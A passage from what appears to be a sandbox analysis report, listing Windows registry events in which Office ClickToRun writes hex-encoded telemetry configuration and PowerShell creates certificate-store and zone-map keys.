Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|9" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.10 = 65735c22203a207b205c224576656e74735c22203a207b205c22496e636f6d70617469626c6543736956657273696f6e44657465637465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c224f66666963655c22203a207b205c225375624e616d657370616365735c22203a207b205c2246696c65494f5c22203a207b205c225375624e616d657370616365735c22203a207b205c224353495c22203a207b205c225375624e616d657370616365735c22203a207b205c2253746f726167655c22203a207b205c224576656e74735c22203a207b205c2243616368654f707469637356325c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d2c205c224d6f6373695c22203a207b205c224576656e74735c22203a207b205c22557064617465486f73745469705c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4772617068696373222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22415243457863657074696f6e53636f70655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2245326f5669657752656e646572506572666f726d616e636541637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224172745669657756616c69646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f6669745368617065546f54657874436d645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f704c6576656c456666656374447261775c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174654269746d617046726f6d506c6174666f726d4269746d61705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e6b496e70757453757266616365426173655570646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250617468576964656e657246576964656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250617468576964656e657246576964656e53696d706c65506174685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224776697a536d61727441727450726f7065727469657354656c656d657472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726561746544657669636544334431305c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22537065637472655472616e73636f646541637469766974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e73657274496e646976696475616c4d6f64656c334441637469766974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61646564496d61676550726f706572746965735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e736572744d6f64656c334441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22537065637472654372656174655363656e6541637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224d6f64656c334452656e64657241637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4964656e74697479222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22456e7375726550726f7669646572496e697465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574506572736f6e50726f66696c6553657475705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224964656e74697479536e617073686f745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657450726f7669646572466f7241757468536368656d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472794964656e74697479506172656e744d617463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526f616d696e6750726f7879496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536861726564437265645265667265736846726f6d53746f72655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526561644f6e6546726f6d43726564656e7469616c4c6973745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22435265616453796e635461736b52756e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f6d61696e4a6f696e65644f72436c6f7564446f6d61696e4a6f696e656453657373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744164616c416363657373546f6b656e46726f6d4372656450726f76696465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574436f6e666967546f6b656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574426c6f636b696e67536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22506f70756c617465536572766963654d61705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657441757468656e74696361746564536572766963655469636b65745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526566726573684964656e7469746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765745365727669636555726c466f7246656465726174696f6e50726f7669646572416e616c797369735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225365727669636555726c5374617475735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241637175697265536572766963655469636b6574466f724144414c5c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2253697465735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e496e736967687473222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22496e73696768747350616e655c22203a207b205c224576656e74735c22203a207b205c22415c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22445c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2248746d6c5072656665746368526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436163686546696c654e6f7456616c69645c22203a207b205c224576656e74466c61675c22203a20323536207d207d2c205c225375624e616d657370616365735c22203a207b205c224f66666963655c22203a207b205c224576656e74735c22203a207b205c2253797374656d616c69645c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22496e7369676874735c22203a207b205c224576656e74735c22203a207b205c22496e73696768747350616e655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e73696768747350616e65305c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e73696768747350616e65725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d5c22203a207b205c224576656e74735c22203a207b205c224163746976697479715c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224163746976697479735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d2c205c22536d6172744c6f6f6b75705c22203a207b205c224576656e74735c22203a207b205c22415c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f7079466561747572654761746573315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f7079466561747572654761746573325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331305c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331335c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331355c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573335c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573345c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573355c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573365c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573375c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573385c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573395c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2248746d6c5072656665746368526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225265667265736843616368656446696c65735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446f776e6c6f61645265736f757263655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2241757468656e7469636174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22526573756c7447726f7570546f52656e6465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253656e64576562536f636b6574526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22576562536f636b657450696e67506f6e674c6174656e63795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446961676e6f737469635c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2238564d65686c6c5c22203a207b205c225375624e616d657370616365735c22203a207b205c22356b69614b3747426b7a505746675c22203a207b205c224576656e74735c22203a207b205c22373139305c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c22385c22203a207b205c225375624e616d657370616365735c22203a207b205c227a424b387872415553554e52497859484e4b55415c22203a207b205c224576656e74735c22203a207b205c22393133335c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224f66666963655c22203a207b205c224576656e74735c22203a207b205c2253797374656d644d617463685c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22496e7369676874735c22203a207b205c224576656e74735c22203a207b205c22536d6172744c6f6f6b75705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536d6172744c6f6f6b75705f5f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536d6172744c6f6f6b75705f5f5f5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d5c22203a207b205c224576656e74735c22203a207b205c2241637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d68633863674f6a46515c22203a207b205c224576656e74735c22203a207b205c22383635335c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d2c205c22556952756e74696d655c22203a207b205c224576656e74735c22203a207b205c22437265617465576562536f636b65745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2250726f636573735265717565737451756575655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e74656e745365727669636550726f78794f6e436f6e6e656374696f6e436c6f7365645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f6e436f6e6e656374696f6e436c6f7365645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4c6963656e73696e67222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224c6963656e73696e67427573626172416374696f6e5c22203a207b205c224576656e74466c61675c22203a203439343038207d2c205c22487244697370617463685375625461736b53746172745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22517569636b56616c69646174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253617665416c6c536b75696473546f52656769737472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2257616974546f52657472794865617274626561745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536561726368466f7253657373696f6e546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224e554c56616c69646174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2256616c696461746553657373696f6e546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2243616e52756e4665617475726543616368655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22506572666f726d4c6963656e73696e674e6f74696669636174696f6e735c22203a207b205c224576656e74466c61675c22203a20323536207d207d2c205c225375624e616d657370616365735c22203a207b205c224c5655585c22203a207b205c224576656e74735c22203a207b205c224e6f456e7469746c656d656e74735c22203a207b205c224576656e74466c61675c22203a203439343038207d2c205c224e6f456e7469746c656d656e74734578706572696d656e74547269676765725c22203a207b205c224576656e74466c61675c22203a203439343038207d207d207d2c205c224f6666696365436c69656e744c6963656e73696e675c22203a207b205c224576656e74735c22203a207b205c224c6963656e7365436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6567616379416374697669747953756363657373436f756e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c656761637941637469766974794661696c757265436f756e745c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22436c69656e745c22203a207b205c224576656e74735c22203a207b205c224653686f756c6441637469766174655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224865617274626561745c22203a207b205c224576656e74735c22203a207b205c22577269746543616368655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265616443616368655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22517569636b56616c69646174696f6e5c22203a207b205c224576656e74735c22203a207b205c224c6f61644c6963656e73655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246756c6c56616c69646174696f6e5c22203a207b205c224576656e74735c22203a207b205c224c6f61644c6963656e73655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2250726f706572746965735c22203a207b205c224576656e74735c22203a207b205c224765744c6963656e736543617465676f72795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f6b656e697a654c6963656e736543617465676f726965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174654c6963656e736543617465676f726965735c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224272616e64696e675c22203a207b205c224576656e74735c22203a207b205c22476574 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "17110988,7153487,39965824,41816131,7202265,5804129,17110992,7202269,41484365,24262478,9179409,17962391,508368333,17962392,25036127,24262477,3462423,3702920,3700754,3965062,24262474,4297094,7153421,3462365,18716193,7153435,24262473,9179410,20502174,6308191,18407617,39125643,539756558,6104718,9179411,51475283,41185282,39389248,539756557,528570079" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.6 = 6d656e7473456e61626c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224368617443616c6c6f757455736572496e697455495c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d736f494d5365727669636573497357616343686174456e61626c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d736f494d536572766963657353664257616343686174456e61626c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d736f494d536572766963657353664357616343686174456e61626c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617455494d6f64656c4f6e55494576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224368617443616c6c6f7574557365724f6e5061727469636970616e744c6973744368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6175746847616c6c65727955736572437265617465416374696f6e4875624c69737446726f6d536e617073686f745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22436f6175746847616c6c65727955736572437265617465466c65784c69737446726f6d536e617073686f745c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22436f6c6c61625c22203a207b205c225375624e616d657370616365735c22203a207b205c22436f617574686f725c22203a207b205c225375624e616d657370616365735c22203a207b205c22436f617574686f72446f63756d656e7448656c7065725c22203a207b205c224576656e74735c22203a207b205c22547269676765725265747269657665446f63756d656e74436f617574686f72735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225265747269657665456469746f72735461626c654d616e616765725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225265747269657665527463557365725c22203a207b205c224576656e74466c61675c22203a20353132207d207d207d207d207d207d207d2c205c2241744d656e74696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22446f63756d656e744163746976697479496e746567726174696f6e5c22203a207b205c224576656e74735c22203a207b205c224164645265636f7665726564416374697669746965735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2250726f6365737341744d656e74696f6e4e6f74696669636174696f6e734c6973745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6d6d656e74734e6f74696669636174696f6e436f6c6c6563746f7252656d6f766564436f6d6d656e74735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2250726f63657373436f6d6d656e74734e6f74696669636174696f6e734c6973745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22536176654c6f67466f725265636f766572795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22437265617465446f63756d656e7441637469766974794c6f674d616e616765725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2244656c657465436f6d6d656e7441637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22446973636172644c6f63616c416374697669746965735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2244656c6574655265706c7941637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2243726561746541744d656e74696f6e41637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2244656c65746541744d656e74696f6e41637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2244656c6574654d6f6465726e436f6d6d656e7441637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224372656174654d6f6465726e41744d656e74696f6e41637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f70656e4c6f6746726f6d5265636f766572795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2244656c6574654d6f6465726e5265706c7941637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225064616c6d446f63756d656e7441637469766974794c6f674d616e616765725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22456e73757265446f63756d656e744163746976697479436170747572655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456e737572654c6f67507265526571735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d6574726f4f70656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726561746555736572496e666f466f72417574686f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22437265617465556e69717565417574686f72566563746f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726561746555736572496e666f46726f6d417574686f72566563746f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224973436c6f7564446f63756d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225365745361766564507265526571735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174655265766973696f6e53657441637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574436f6d6d656e74436f6e74656e744964656e7469666965725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f67436f6d6d656e744174747269627574696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472794372656174654c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536176654c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253657453617665645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224162616e646f6e4c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174655461736b41637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225461736b4372656174696f6e41637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526561737369676e5461736b41637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656f70656e5461736b41637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6d706c6574655461736b41637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224465736b746f704261636b73746167655c22203a207b205c224576656e74735c22203a207b205c22536176654173526563656e74436c69636b65645c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2253617665417344656661756c745365727669636553656c656374696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f70656e526563656e74446f63756d656e747356696577436c69636b65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f70656e526563656e74446f63756d656e7473566965775769746846656174757265456e61626c6564436c69636b65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22424743616c634d616e6167657250726f6365737353657456616c75657350726f635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22424743616c6349646c655461736b46457865637574655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22506c6163657347726f757065724163636f756e74496e666f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657474696e67537461727465644d5255536c61624765744d72754461746554696d6547726f7570547970655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f70656e526563656e744c6f636174696f6e7356696577436c69636b65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e617669676174696f6e5265616453697465526f6f74427956726f6f6d5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e617669676174696f6e52656164446f634c6962466f6c646572427956726f6f6d5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224f666669636553706163655c22203a207b205c225375624e616d657370616365735c22203a207b205c224465736b746f704261636b73746167654e617669676174696f6e5c22203a207b205c224576656e74735c22203a207b205c224c617a794c6f616446696c6543616368655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224c6f616446726f6d46696c6543616368655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2253617665496e746f46696c6543616368655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2252656164546869735043526f6f745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22526561644c6f63616c466f6c6465725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225265616453697465526f6f74427956726f6f6d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224765744974656d57656244617655726c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2247657452656d6f74654974656d496e666f726d6174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2252656164446f634c6962466f6c646572427956726f6f6d5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22526561644d696772617465644f4443466f6c646572427956726f6f6d5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d2c205c22504358506572736f6e6150686f746f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f757453706163655c22203a207b205c224576656e74735c22203a207b205c22557064617465506c616365735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486964655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225365744d72754c697374466f72486f6d65506167655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c65616e75705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536861726564576974684d65506f70756c6174654c6973745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174654d52554974656d735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f70656e4469736d6973735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e65774469736d6973735c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c224465736b746f704261636b73746167655c22203a207b205c224576656e74735c22203a207b205c224261636b73746167654469736d69737365645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f5265636f76657279436f6d7061726557697468556e736176656456657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f5265636f7665727944656c657465556e736176656456657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f5265636f766572794f70656e556e736176656456657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f5265636f76657279506f70756c617465556e736176656456657273696f6e4c6973745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e69744e65774e6176466f6c6465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e6577536572766963654c6973745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c225368617265506f696e7453697465735c22203a207b205c224576656e74735c22203a207b205c2247726f75707353697465735265717565737449636f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e745369746573496e697469616c697a655369746573436f6c6c656374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e74536974657350726f63657373526573756c74466f724964656e746974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e7453697465734964656e74697479436163686552657175657374526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e7453697465735265717565737453697465734361636865645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e7453697465735265717565737453697465734173796e6350726f63657373526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e7453697465735265717565737453697465734173796e635c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224372656174654c6f636174696f6e735c22203a207b205c224576656e74735c22203a207b205c2244656661756c744964656e74697479456d7074795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253686172696e674c6567616379436c69656e745c22203a207b205c224576656e74735c22203a207b205c22476574446174615c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22486f6d65506167655c22203a207b205c224576656e74735c22203a207b205c22506c6163654368616e6765536c6162436f6e646974696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e53686f77486f6d65506167655c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c225365617263685c22203a207b205c224576656e74735c22203a207b205c225365656e4279557365725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224f666669636553746172745c22203a207b205c224576656e74735c22203a207b205c22536574757054656d706c61746550726f706572746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243757272656e745549416374697665506c6163654368616e67655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22547269676765725468756d626e61696c416374696f6e52756e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f63756d656e744e6f74696669636174696f6e735c22203a207b205c224576656e74735c22203a207b205c2252656769737465724f6e49646c65466561747572654761746544697361626c65645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d7275536572766963654170695c22203a207b205c225375624e616d657370616365735c22203a207b205c22446f63756d656e74735c22203a207b205c224576656e74735c22203a207b205c2252656164526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225772697465526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e526571756573745375636365656465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22506c616365735c22203a207b205c224576656e74735c22203a207b205c2252656164526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225772697465526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e526571756573745375636365656465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224d736f53686172696e675c22203a207b205c224576656e74735c22203a207b205c22434d736f53686172696e675365727669636548656c706572456e